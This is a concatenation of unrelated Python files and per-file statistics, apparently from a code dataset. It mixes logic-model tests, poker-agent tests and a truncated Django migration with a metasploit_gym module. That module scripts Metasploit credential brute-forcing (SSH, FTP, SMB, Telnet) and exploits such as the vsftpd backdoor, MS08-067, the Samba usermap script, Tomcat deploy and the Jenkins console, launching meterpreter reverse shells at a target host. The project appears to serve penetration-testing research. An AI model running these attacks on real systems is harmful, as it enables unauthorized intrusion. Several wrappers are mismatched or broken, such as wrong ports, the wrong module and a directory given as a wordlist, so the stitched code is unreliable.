all_activations.append(new_activations)
return all_activations
| 34.017341
| 96
| 0.615293
| 1,355
| 11,770
| 5.191144
| 0.129889
| 0.054592
| 0.038385
| 0.031845
| 0.924367
| 0.918396
| 0.912994
| 0.909298
| 0.898635
| 0.885272
| 0
| 0.007363
| 0.284537
| 11,770
| 345
| 97
| 34.115942
| 0.82793
| 0.390909
| 0
| 0.882716
| 0
| 0.012346
| 0.060606
| 0
| 0
| 0
| 0
| 0
| 0.037037
| 1
| 0.030864
| false
| 0
| 0.012346
| 0
| 0.074074
| 0.012346
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4ceea5f4cec9bb94754cc5da49b08837bb9ff83a
| 119
|
py
|
Python
|
baseline/exp3_2d3ds/models/__init__.py
|
COATZ/ugscnn
|
23feb8465863aa473048ca40ede651356d977ac3
|
[
"MIT"
] | null | null | null |
baseline/exp3_2d3ds/models/__init__.py
|
COATZ/ugscnn
|
23feb8465863aa473048ca40ede651356d977ac3
|
[
"MIT"
] | null | null | null |
baseline/exp3_2d3ds/models/__init__.py
|
COATZ/ugscnn
|
23feb8465863aa473048ca40ede651356d977ac3
|
[
"MIT"
] | null | null | null |
from .duc_hdc import *
from .fcn8s import *
from .fcn8s_sphe import *
from .u_net import *
from .u_net_sphe import *
| 23.8
| 26
| 0.731092
| 20
| 119
| 4.1
| 0.4
| 0.487805
| 0.365854
| 0.341463
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.020619
| 0.184874
| 119
| 5
| 27
| 23.8
| 0.824742
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
e250f528fd76634c6baafa2a9c6f0344b23f0a5b
| 8,654
|
py
|
Python
|
old/old/model_tests.py
|
avigad/boole
|
2a436c2967dbc968f6a5877c220b9757c3bc17c3
|
[
"Apache-2.0"
] | 16
|
2015-01-01T18:21:35.000Z
|
2021-11-20T00:39:25.000Z
|
old/old/model_tests.py
|
avigad/boole
|
2a436c2967dbc968f6a5877c220b9757c3bc17c3
|
[
"Apache-2.0"
] | null | null | null |
old/old/model_tests.py
|
avigad/boole
|
2a436c2967dbc968f6a5877c220b9757c3bc17c3
|
[
"Apache-2.0"
] | 1
|
2021-05-14T11:12:31.000Z
|
2021-05-14T11:12:31.000Z
|
##################################################
#
# Tests for model.py
#
#
#
#
#
#
#
#
#
#
#
##################################################
from boole.core.model import *
from boole.core.language import clear_default_language
from nose.tools import *
def is_prime(x):
if x == 0 or x == 1:
return False
elif x == 2:
return True
else:
for i in range(2, x):
if x % i == 0:
return False
return True
def test_val_strict():
#It is annoying that types can not be redefined: turn into a warning?
clear_default_language()
x, y, z = Int('x y z')
p, q, r, s = Bool('p q r s')
People = EnumType('People', ['Alice', 'Bob', 'Carol'])
Alice, Bob, Carol = People.make_constants()
u1, u2, u3, u4, u5 = People('u1 u2 u3 u4 u5')
assert_equal(val_strict(ii(3)), 3)
assert_equal(val_strict(rr(4.5)), 4.5)
assert_equal(val_strict(-ii(3) + (4.5) * (2)), 6)
assert_equal(val_strict(Alice), 'Alice')
assert_equal(val_strict(Bob), 'Bob')
assert(val_strict(Forall(u1, (u1 == Alice) | (u1 == Bob) | (u1 == Carol))))
assert(not val_strict(Forall(u1, (u1 == Alice) | (u1 == Bob))))
assert(not val_strict(true != true))
assert(not val_strict(Exists([u1, u2, u3, u4], And(u1 != u2, u1 != u3, u1 != u4,
u2 != u3, u2 != u4, u3 != u4))))
assert(val_strict(true & (false >> true)))
assert(not val_strict(true & ~(false >> true)))
assert(val_strict(Abs([x, y], x + y)((5), (7))))
assert(val_strict(Exists(p, p)))
e = Exists([p, q, r], (p >> q & r) & ~(r >> p & q))
assert(val_strict(e))
assert(not val_strict(Forall([p,q], Exists(r, p >> r & q >> ~r))))
assert(val_strict(Forall([p,q], (((p >> q) >> p) >> p))))
a, b, c = Int('a, b, c')
Even = Const('Even', Int >> Bool)
Prime = Const('Prime', Int >> Bool)
suc, square = (Int >> Int)('suc, square')
a, b, c = Int('a, b, c')
Even = Const('Even', Int >> Bool)
Prime = Const('Prime', Int >> Bool)
suc, square = (Int >> Int)('suc, square')
M = Model({(a, 5), (b, 2), (c, 7)})
M[Int] = dom_range(0,20)
M[Even] = lambda x: x % 2 == 0
M[Prime] = is_prime
M[suc] = lambda x: x + 1
M[square] = lambda x: x * x
assert_equal(val_strict(a, M), 5)
assert_equal(val_strict(a + b * c, M), 19)
assert(val_strict(Exists(x, b + x == c), M))
assert(not val_strict(Even(a), M))
assert(val_strict(Prime((23)), M))
assert(not val_strict(Prime((22)), M))
assert(val_strict(And(Prime(a), Prime(b), Prime(c)), M))
assert(val_strict(Even(c) | And(Prime(a), Prime(b), Prime(c)), M))
assert(not val_strict(Even(c) | And(Prime(suc(a)), Prime(suc(b)), Prime(c)), M))
assert(val_strict(Exists(x, Even(x)), M))
assert(val_strict(Exists(x, And(Prime(x), Even(x))), M))
assert(not val_strict(Exists(x, And(Prime(x), Even(x), c < x)), M))
assert(val_strict(Exists([x, y], And(Prime(x), Prime(y), x < y)), M))
assert(val_strict(Exists([x, y], And(Prime(x), Prime(y), x != y)), M))
assert(not val_strict(Exists([x, y], And(Prime(x), Prime(y), x < y, Even(y))), M))
assert(val_strict(Exists([x, y], And(Prime(x), Prime(y), x < y, Even(x))), M))
assert(not val_strict(Forall(x, Even(x)), M))
assert(val_strict(Forall(x, Or(Even(x), ~Even(x))), M))
assert(val_strict(Forall(x, Even(x) >> ~Even(suc(x))), M))
assert(val_strict(Forall(x, Even(x) >> Even(square(x))), M))
assert(not val_strict(Exists(x, And(Even(x), ~Even(square(x)))), M))
assert(val_strict(Forall(x, Even(square(x)) >> Even(x)), M))
assert(not val_strict(Forall([x, y], And(Prime(x), Prime(y), x < y) >> Even(x)), M))
assert(val_strict(Forall([x, y], And(Prime(x), Prime(y), x < y) >> ~Even(y)), M))
assert(not val_strict(Forall(x, Exists(y, x < y)), M))
assert(not val_strict(Forall([x, y], x < y >> Exists(z, And(x < z, z < y))), M))
assert(val_strict(Forall([x, y], And(Even(x), Even(y), x < y) >>
Exists(z, (x < z) & (z < y))), M))
def precond(n):
return ((2) < n) & Even(n)
def goldbach(n):
return precond(n) >> Exists([x,y], Prime(x) & Prime(y) & (x + y == n))
Goldbach = Forall(z, goldbach(z))
assert(val_strict(Goldbach, M))
def test_val_non_strict():
clear_default_language()
x, y, z = Int('x y z')
p, q, r, s = Bool('p q r s')
People = EnumType('People', ['Alice', 'Bob', 'Carol'])
Alice, Bob, Carol = People.make_constants()
u1, u2, u3, u4, u5 = People('u1 u2 u3 u4 u5')
assert_equal(val_non_strict(ii(3)), 3)
assert_equal(val_non_strict(rr(4.5)), 4.5)
assert_equal(val_non_strict(-(3) + (4.5) * ii(2)), 6)
assert_equal(val_non_strict(Alice), 'Alice')
assert_equal(val_non_strict(Bob), 'Bob')
assert_equal(val_non_strict(x), None)
assert(val_non_strict(Forall(u1, (u1 == Alice) | (u1 == Bob) | (u1 == Carol))))
assert(not val_non_strict(Forall(u1, (u1 == Alice) | (u1 == Bob))))
assert(not val_non_strict(true != true))
assert(not val_non_strict(Exists([u1, u2, u3, u4], And(u1 != u2, u1 != u3, u1 != u4,
u2 != u3, u2 != u4, u3 != u4))))
assert(val_non_strict(true & (false >> true)))
assert(not val_non_strict(true & ~(false >> true)))
assert(val_non_strict(Abs([x, y], x + y)((5), (7))))
assert(val_non_strict(Exists(p, p)))
e = Exists([p, q, r], (p >> q & r) & ~(r >> p & q))
assert(val_non_strict(e))
assert(not val_non_strict(Forall([p,q], Exists(r, p >> r & q >> ~r))))
assert(val_non_strict(Forall([p,q], (((p >> q) >> p) >> p))))
assert(val_non_strict(true | p))
a, b, c = Int('a, b, c')
Even = Const('Even', Int >> Bool)
Prime = Const('Prime', Int >> Bool)
suc, square = (Int >> Int)('suc, square')
a, b, c = Int('a, b, c')
Even = Const('Even', Int >> Bool)
Prime = Const('Prime', Int >> Bool)
suc, square = (Int >> Int)('suc, square')
M = Model({(a, 5), (b, 2), (c, 7)})
M[Int] = dom_range(0,20)
M[Even] = lambda x: x % 2 == 0
M[Prime] = is_prime
M[suc] = lambda x: x + 1
M[square] = lambda x: x * x
assert_equal(val_non_strict(a, M), 5)
assert_equal(val_non_strict(a + b * c, M), 19)
assert(val_non_strict(Exists(x, b + x == c), M))
assert(not val_non_strict(Even(a), M))
assert(val_non_strict(Prime((23)), M))
assert(not val_non_strict(Prime((22)), M))
assert(val_non_strict(And(Prime(a), Prime(b), Prime(c)), M))
assert(val_non_strict(Even(c) | And(Prime(a), Prime(b), Prime(c)), M))
assert(not val_non_strict(Even(c) | And(Prime(suc(a)), Prime(suc(b)), Prime(c)), M))
assert(val_non_strict(Exists(x, Even(x)), M))
assert(val_non_strict(Exists(x, And(Prime(x), Even(x))), M))
assert(not val_non_strict(Exists(x, And(Prime(x), Even(x), c < x)), M))
assert(val_non_strict(Exists([x, y], And(Prime(x), Prime(y), x < y)), M))
assert(val_non_strict(Exists([x, y], And(Prime(x), Prime(y), x != y)), M))
assert(not val_non_strict(Exists([x, y], And(Prime(x), Prime(y), x < y, Even(y))), M))
assert(val_non_strict(Exists([x, y], And(Prime(x), Prime(y), x < y, Even(x))), M))
assert(not val_non_strict(Forall(x, Even(x)), M))
assert(val_non_strict(Forall(x, Or(Even(x), ~Even(x))), M))
assert(val_non_strict(Forall(x, Even(x) >> ~Even(suc(x))), M))
assert(val_non_strict(Forall(x, Even(x) >> Even(square(x))), M))
assert(not val_non_strict(Exists(x, And(Even(x), ~Even(square(x)))), M))
assert(val_non_strict(Forall(x, Even(square(x)) >> Even(x)), M))
assert(not val_non_strict(Forall([x, y], And(Prime(x), Prime(y), x < y) >> Even(x)), M))
assert(val_non_strict(Forall([x, y], And(Prime(x), Prime(y), x < y) >> ~Even(y)), M))
assert(not val_non_strict(Forall(x, Exists(y, x < y)), M))
assert(not val_non_strict(Forall([x, y], x < y >> Exists(z, And(x < z, z < y))), M))
assert(val_non_strict(Forall([x, y], And(Even(x), Even(y), x < y) >>
Exists(z, (x < z) & (z < y))), M))
def precond(n):
return ((2) < n) & Even(n)
def goldbach(n):
return precond(n) >> Exists([x,y], Prime(x) & Prime(y) & (x + y == n))
Goldbach = Forall(z, goldbach(z))
assert(val_non_strict(Goldbach, M))
def test_lazy_models():
clear_default_language()
def nats():
i = 0
while True:
yield i
i += 1
nat_dom = Domain('nat', nats)
Prime = Const('Prime', Int >> Bool)
M = Model()
M[Int] = nat_dom
M[Prime] = is_prime
x = Int('x')
assert(val_strict(Exists(x, Prime(x)), M))
| 38.633929
| 92
| 0.555119
| 1,458
| 8,654
| 3.173525
| 0.071331
| 0.072617
| 0.121893
| 0.089475
| 0.905554
| 0.857143
| 0.79987
| 0.746056
| 0.713205
| 0.690728
| 0
| 0.019645
| 0.217703
| 8,654
| 223
| 93
| 38.807175
| 0.663811
| 0.009938
| 0
| 0.36
| 0
| 0
| 0.026387
| 0
| 0
| 0
| 0
| 0
| 0.52
| 1
| 0.051429
| false
| 0
| 0.017143
| 0.022857
| 0.114286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e2b86d9c3452142df7bd7020bf19a4c57caca2de
| 3,520
|
py
|
Python
|
test/weak_agents_tests.py
|
JakubPetriska/poker-agent-kit
|
12c28711c91447c708719454d1fbd224fa03189e
|
[
"MIT"
] | 19
|
2018-09-21T15:27:09.000Z
|
2022-03-09T03:55:21.000Z
|
test/weak_agents_tests.py
|
JakubPetriska/poker-agent-kit
|
12c28711c91447c708719454d1fbd224fa03189e
|
[
"MIT"
] | 6
|
2018-05-09T17:09:58.000Z
|
2019-07-09T15:15:05.000Z
|
test/weak_agents_tests.py
|
JakubPetriska/poker-cfr
|
12c28711c91447c708719454d1fbd224fa03189e
|
[
"MIT"
] | 2
|
2018-09-11T02:49:57.000Z
|
2018-11-17T00:29:38.000Z
|
import unittest
import acpc_python_client as acpc
from tools.constants import Action
from weak_agents.action_tilted_agent import create_agent_strategy, create_agent_strategy_from_trained_strategy, TiltType
from tools.io_util import read_strategy_from_file
from evaluation.exploitability import Exploitability
from tools.game_utils import is_strategies_equal, is_correct_strategy
KUHN_POKER_GAME_FILE_PATH = 'games/kuhn.limit.2p.game'
LEDUC_POKER_GAME_FILE_PATH = 'games/leduc.limit.2p.game'
class WeakAgentsTests(unittest.TestCase):
def test_kuhn_action_tilted_agent_not_crashing(self):
strategy = create_agent_strategy(
KUHN_POKER_GAME_FILE_PATH,
Action.RAISE,
TiltType.ADD,
0.2,
cfr_iterations=20,
cfr_weight_delay=2,
show_progress=False)
self.assertTrue(is_correct_strategy(strategy))
def test_leduc_add_action_tilted_agent_not_crashing(self):
strategy = create_agent_strategy(
LEDUC_POKER_GAME_FILE_PATH,
Action.FOLD,
TiltType.ADD,
0.1,
cfr_iterations=5,
cfr_weight_delay=2,
show_progress=False)
self.assertTrue(is_correct_strategy(strategy))
def test_leduc_multiply_action_tilted_agent_not_crashing(self):
strategy = create_agent_strategy(
LEDUC_POKER_GAME_FILE_PATH,
Action.FOLD,
TiltType.MULTIPLY,
0.1,
cfr_iterations=5,
cfr_weight_delay=2,
show_progress=False)
self.assertTrue(is_correct_strategy(strategy))
def test_kuhn_action_tilted_agent(self):
kuhn_equilibrium, _ = read_strategy_from_file(
KUHN_POKER_GAME_FILE_PATH,
'strategies/kuhn.limit.2p-equilibrium.strategy')
game = acpc.read_game_file(KUHN_POKER_GAME_FILE_PATH)
exploitability = Exploitability(game)
tilted_agent_strategy = create_agent_strategy_from_trained_strategy(
KUHN_POKER_GAME_FILE_PATH,
kuhn_equilibrium,
Action.RAISE,
TiltType.ADD,
0.2)
self.assertTrue(is_correct_strategy(tilted_agent_strategy))
self.assertTrue(not is_strategies_equal(kuhn_equilibrium, tilted_agent_strategy))
equilibrium_exploitability = exploitability.evaluate(kuhn_equilibrium)
raise_add_tilted_exploitability = exploitability.evaluate(tilted_agent_strategy)
self.assertTrue(raise_add_tilted_exploitability > equilibrium_exploitability)
def test_kuhn_action_minus_tilted_agent(self):
kuhn_equilibrium, _ = read_strategy_from_file(
KUHN_POKER_GAME_FILE_PATH,
'strategies/kuhn.limit.2p-equilibrium.strategy')
game = acpc.read_game_file(KUHN_POKER_GAME_FILE_PATH)
exploitability = Exploitability(game)
tilted_agent_strategy = create_agent_strategy_from_trained_strategy(
KUHN_POKER_GAME_FILE_PATH,
kuhn_equilibrium,
Action.CALL,
TiltType.ADD,
-0.5)
self.assertTrue(is_correct_strategy(tilted_agent_strategy))
self.assertTrue(not is_strategies_equal(kuhn_equilibrium, tilted_agent_strategy))
equilibrium_exploitability = exploitability.evaluate(kuhn_equilibrium)
raise_add_tilted_exploitability = exploitability.evaluate(tilted_agent_strategy)
self.assertTrue(raise_add_tilted_exploitability > equilibrium_exploitability)
| 38.681319
| 120
| 0.715909
| 404
| 3,520
| 5.772277
| 0.163366
| 0.083619
| 0.061321
| 0.080189
| 0.826329
| 0.812607
| 0.764151
| 0.764151
| 0.742281
| 0.742281
| 0
| 0.007704
| 0.225568
| 3,520
| 90
| 121
| 39.111111
| 0.847762
| 0
| 0
| 0.716216
| 0
| 0
| 0.039489
| 0.039489
| 0
| 0
| 0
| 0
| 0.121622
| 1
| 0.067568
| false
| 0
| 0.094595
| 0
| 0.175676
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2cc678dfef8cb0874fecfe2385fa62869906f077
| 14,652
|
py
|
Python
|
metasploit_gym/action/exploit.py
|
phreakAI/MetasploitGym
|
128b977ccebbbb026784cba0ecd82182fdfb0cdb
|
[
"MIT"
] | 6
|
2021-10-01T20:05:24.000Z
|
2022-03-24T20:14:41.000Z
|
metasploit_gym/action/exploit.py
|
phreakAI/MetasploitGym
|
128b977ccebbbb026784cba0ecd82182fdfb0cdb
|
[
"MIT"
] | 1
|
2021-12-13T09:24:56.000Z
|
2022-03-27T02:08:14.000Z
|
metasploit_gym/action/exploit.py
|
phreakAI/MetasploitGym
|
128b977ccebbbb026784cba0ecd82182fdfb0cdb
|
[
"MIT"
] | null | null | null |
"""Exploits currently supported
Straightforward to add more following the basic model presented here
"""
from .action import Exploit
import time
def wait_for_job_completion(job_info, client):
if job_info is not None:
if "error" in job_info:
return
job_is_running = True
while job_is_running:
job_id = job_info["uuid"]
results = client.jobs.info_by_uuid(job_id)
if "error" in results:
return
if results["status"] == "completed":
job_is_running = False
else:
time.sleep(1)
class SSH_Bruteforce(Exploit):
"""port 22 bruteforce
https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ssh/ssh_login.rb
"""
def __init__(self, target=(0, 0)):
self.name = "SSH_Bruteforce"
self.service = "ssh"
self.target = target
self.req_access = None
self.req_os = None
self.req_version = None
super(Exploit, self).__init__(
self.name, self.target, self.req_access, self.req_os, self.req_version
)
def execute(self, client, host, port=22):
"""
:param client: metasploit client object
:param host: string representing IP of the target
:param port: default port 22
:return:
"""
exploit = client.modules.use("auxiliary", "scanner/ssh/ssh_login")
exploit["RHOSTS"] = host
exploit["RPORT"] = port
# TODO: This should be detected based on metasploit rpc server
exploit["USERPASS_FILE"] = "/usr/share/metasploit-framework/data/wordlists"
job_info = exploit.execute()
wait_for_job_completion(job_info, client)
class FTP_Bruteforce(Exploit):
"""port 23 bruteforce
https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/ftp_login.rb
"""
def __init__(self, target=(0, 0)):
self.name = "FTP_Bruteforce"
self.service = "ftp"
self.target = target
self.req_access = None
self.req_os = None
self.req_version = None
super(Exploit, self).__init__(
self.name, self.target, self.req_access, self.req_os, self.req_version
)
def execute(self, client, host, port=23):
"""
:param client: metasploit client object
:param host: string representing IP of the target
:param port: default port 23
:return:
"""
exploit = client.modules.use("auxiliary", "scanner/ftp/ftp_login")
exploit["RHOSTS"] = host
exploit["RPORT"] = port
# TODO: This should be detected based on metasploit rpc server
exploit["USERPASS_FILE"] = "/usr/share/metasploit-framework/data/wordlists"
job_info = exploit.execute()
wait_for_job_completion(job_info, client)
class SMB_Bruteforce(Exploit):
"""
port 445 bruteforce
https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_login.rb
"""
def __init__(self, target=(0, 0)):
self.name = "SMB_Bruteforce"
self.service = "Microsoft-DS"
self.target = target
self.req_access = None
self.req_os = None
self.req_version = None
super(Exploit, self).__init__(
self.name, self.target, self.req_access, self.req_os, self.req_version
)
def execute(self, client, host, port=445):
"""
:param client: metasploit client object
:param host: string representing IP of the target
:param port: default port 445
:return:
"""
exploit = client.modules.use("auxiliary", "scanner/smb/smb_login")
exploit["RHOSTS"] = host
exploit["RPORT"] = port
exploit[
"USERPASS_FILE"
] = "/usr/share/metasploit-framework/data/wordlists" # TODO: This should be detected based on metasploit rpc server
job_info = exploit.execute()
wait_for_job_completion(job_info, client)
class Telnet_Bruteforce(Exploit):
"""port 23 bruteforce
https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/telnet/telnet_login.rb
"""
def __init__(self, target=(0, 0)):
self.name = "Telnet_Bruteforce"
self.service = "telnet"
self.target = target
self.req_access = None
self.req_os = None
self.req_version = None
super(Exploit, self).__init__(
self.name, self.target, self.req_access, self.req_os, self.req_version
)
def execute(self, client, host, port=445):
"""
:param client: metasploit client object
:param host: string representing IP of the target
:param port: default port 445
:return:
"""
exploit = client.modules.use("auxiliary", "scanner/telnet/telnet_login")
exploit["RHOSTS"] = host
exploit["RPORT"] = port
exploit[
"USERPASS_FILE"
] = "/usr/share/metasploit-framework/data/wordlists" # TODO: This should be detected based on metasploit rpc server
job_info = exploit.execute()
wait_for_job_completion(job_info, client)
class VSFTPD(Exploit):
"""use exploit/unix/ftp/vsftpd_234_backdoor
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
Args:
Exploit ([type]): vsftpd 2.3.4 port 21
Raises:
NotImplementedError: [description]
"""
def __init__(self, target=(0, 0)):
self.name = "VSFTPD"
self.service = "ftp"
self.target = target
self.req_access = None
self.req_os = "unix"
self.req_version = None
super(Exploit, self).__init__(
self.name, self.target, self.req_access, self.req_os, self.req_version
)
def execute(self, client, host, port=21):
"""
:param client: metasploit client object
:param host: string representing IP of the target
:param port: default port 21
:return:
"""
exploit = client.modules.use("exploit", "unix/ftp/vsftpd_234_backdoor")
exploit["RHOSTS"] = host
exploit["RPORT"] = port
job_info = exploit.execute(payload="cmd/unix/interact")
wait_for_job_completion(job_info, client)
class JavaRMIServer(Exploit):
"""[summary]
https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/modules/exploits/multi/misc/java_rmi_server.rb
Args:
Exploit ([type]): [description]
"""
def __init__(self, target=(0, 0)):
self.name = "Java_RMI_Server"
self.service = "http"
self.target = target
self.req_access = None
self.req_os = None
self.req_version = None
super(Exploit, self).__init__(
self.name, self.target, self.req_access, self.req_os, self.req_version
)
def execute(self, client, host, port=1099):
"""
:param client: metasploit client object
:param host: string representing IP of the target
:param port: default port 21
:return:
"""
exploit = client.modules.use("exploit", "multi/misc/java_rmi_server")
exploit["RHOSTS"] = host
exploit["RPORT"] = port
exploit.execute(cmd="java/meterpreter/reverse_https")
class Ms08_067_Netapi(Exploit):
"""https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/smb/ms08_067_netapi.rb
Classic smb exploitation through crafted rpc packet. Works great on windows xp.
Args:
Exploit ([type]): [description]
"""
def __init__(self, target=(0, 0)):
self.name = "ms08_067_netapi"
self.service = "Microsoft-DS"
self.target = target
self.req_access = None
self.req_os = "win"
self.req_version = None
super(Exploit, self).__init__(
self.name, self.target, self.req_access, self.req_os, self.req_version
)
def execute(self, client, host, port=445):
"""
:param client: metasploit client object
:param host: string representing IP of the target
:param port: default port 21
:return:
"""
exploit = client.modules.use("exploit", "windows/smb/ms08_067_netapi")
exploit["RHOSTS"] = host
exploit["RPORT"] = port
job_info = exploit.execute(cmd="windows/meterpreter/reverse_https")
wait_for_job_completion(job_info, client)
class ManageEngine_Auth_Upload(Exploit):
"""https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/manageengine_auth_upload.rb
Http upload that allows remote code execution on ManageEngine ServiceDesk
TODO: Find a vulnerable copy of this for building environments. oy vey.
Args:
Exploit ([type]): [description]
"""
def __init__(self, target=(0, 0)):
self.name = "ManageEngine_Auth_Upload"
self.service = "http"
self.target = target
self.req_access = None
self.req_os = None
self.req_version = None
super(Exploit, self).__init__(
self.name, self.target, self.req_access, self.req_os, self.req_version
)
def execute(self, client, host, port=8080):
"""
:param client: metasploit client object
:param host: string representing IP of the target
:param port: default port 21
:return:
"""
exploit = client.modules.use("exploit", "multi/http/manageengine_auth_upload")
exploit["RHOSTS"] = host
exploit["RPORT"] = port
job_info = exploit.execute(cmd="java/meterpreter/reverse_https")
wait_for_job_completion(job_info, client)
class ApacheJamesExecution(Exploit):
"""https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/smtp/apache_james_exec.rb
'Name' => "Apache James Server 2.3.2 Insecure User Creation Arbitrary File Write"
Args:
Exploit ([type]): [description]
"""
def __init__(self, target=(0, 0)):
self.name = "Apache_James_InsecureUserCreation"
self.service = "smpt"
self.target = target
self.req_access = None
self.req_os = "linux"
self.req_version = None
super(Exploit, self).__init__(
self.name, self.target, self.req_access, self.req_os, self.req_version
)
def execute(self, client, host, port=8080):
"""
:param client: metasploit client object
:param host: string representing IP of the target
:param port: default port 21
:return:
"""
exploit = client.modules.use("exploit", "multi/http/manageengine_auth_upload")
exploit["RHOSTS"] = host
exploit["RPORT"] = port
job_info = exploit.execute(cmd="java/meterpreter/reverse_https")
wait_for_job_completion(job_info, client)
class SambaUsermapScript(Exploit):
"""https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/samba/usermap_script.rb
'Name' => "Samba "username map script" Command Execution"
Args:
Exploit ([type]): [description]
"""
def __init__(self, target=(0, 0)):
self.name = "Samba_Usermap_Script"
self.target = target
self.service = "NetBIOS-SSN"
self.req_access = None
self.req_os = "multi"
self.req_version = None
super(Exploit, self).__init__(
self.name, self.target, self.req_access, self.req_os, self.req_version
)
def execute(self, client, host, port=139):
"""
:param client: metasploit client object
:param host: string representing IP of the target
:param port: default port 139
:return:
"""
exploit = client.modules.use("exploit", "multi/samba/usermap_script")
exploit["RHOSTS"] = host
exploit["RPORT"] = port
job_info = exploit.execute(cmd="java/meterpreter/reverse_https")
wait_for_job_completion(job_info, client)
class ApacheTomcatAuthenticationCodeExecution(Exploit):
"""https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/tomcat_mgr_deploy.rb
'Name' => "Apache Tomcat Manager Application Deployer Authenticated Code Execution"
Args:
Exploit ([type]): [description]
"""
def __init__(self, target=(0, 0)):
self.name = "Apache_Tomcat_Execution"
self.target = target
self.service = "http"
self.req_access = None
self.req_os = "multi"
self.req_version = None
super(Exploit, self).__init__(
self.name, self.target, self.req_access, self.req_os, self.req_version
)
def execute(self, client, host, port=8080):
"""
:param client: metasploit client object
:param host: string representing IP of the target
:param port: default port None
:return:
"""
exploit = client.modules.use("exploit", "multi/http/tomcat_mgr_deploy")
exploit["RHOSTS"] = host
exploit["RPORT"] = port
job_info = exploit.execute(cmd="java/meterpreter/reverse_https")
wait_for_job_completion(job_info, client)
class Jenkins_CI_Script_Java_Execution(Exploit):
"""https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/jenkins_script_console.rb
'Name' => "Jenkins-CI Script-Console Java Execution"
Args:
Exploit ([type]): [description]
"""
def __init__(self, target=(0, 0)):
self.name = "Jenkins_CI_Script_Console_Java_Execution"
self.service = "http"
self.target = target
self.req_access = None
self.req_os = "multi"
self.req_version = None
super(Exploit, self).__init__(
self.name, self.target, self.req_access, self.req_os, self.req_version
)
def execute(self, client, host, port=8080):
"""
:param client: metasploit client object
:param host: string representing IP of the target
:param port: default port 8080
:return:
"""
exploit = client.modules.use("exploit", "multi/http/jenkins_script_console")
exploit["RHOSTS"] = host
exploit["RPORT"] = port
job_info = exploit.execute(cmd="java/meterpreter/reverse_https")
wait_for_job_completion(job_info, client)
| 34.556604
| 143
| 0.628651
| 1,731
| 14,652
| 5.134027
| 0.116118
| 0.056712
| 0.035107
| 0.047035
| 0.843142
| 0.807697
| 0.807697
| 0.761899
| 0.747496
| 0.74322
| 0
| 0.015974
| 0.260852
| 14,652
| 423
| 144
| 34.638298
| 0.804617
| 0.293612
| 0
| 0.669604
| 0
| 0
| 0.144792
| 0.088723
| 0
| 0
| 0
| 0.01182
| 0
| 1
| 0.110132
| false
| 0.017621
| 0.008811
| 0
| 0.180617
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e2e33b457fd2b88a3ff24791b4d153005a095c56
| 24,503
|
py
|
Python
|
core/migrations/0001_initial.py
|
bpotvin-bccrc/colossus
|
fa5ca7ce4cfe794c7d2167acb868aa9167988941
|
[
"MIT"
] | 2
|
2018-10-03T16:05:14.000Z
|
2019-03-08T23:01:29.000Z
|
core/migrations/0001_initial.py
|
bpotvin-bccrc/colossus
|
fa5ca7ce4cfe794c7d2167acb868aa9167988941
|
[
"MIT"
] | 3
|
2019-05-09T22:48:22.000Z
|
2020-06-05T18:52:05.000Z
|
core/migrations/0001_initial.py
|
bpotvin-bccrc/colossus
|
fa5ca7ce4cfe794c7d2167acb868aa9167988941
|
[
"MIT"
] | 4
|
2018-08-16T22:25:10.000Z
|
2021-02-19T16:10:15.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.17 on 2019-07-12 18:40
from __future__ import unicode_literals
import core.helpers
from django.db import migrations, models
import django.db.models.deletion
import simple_history.models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='AdditionalSampleInformation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('tissue_state', models.CharField(blank=True, choices=[('NONE', 'None'), ('FROZ', 'Frozen'), ('FRES', 'Fresh'), ('DIG-FRES', 'Digested-Fresh')], default='NONE', max_length=50, null=True, verbose_name='Tissue State')),
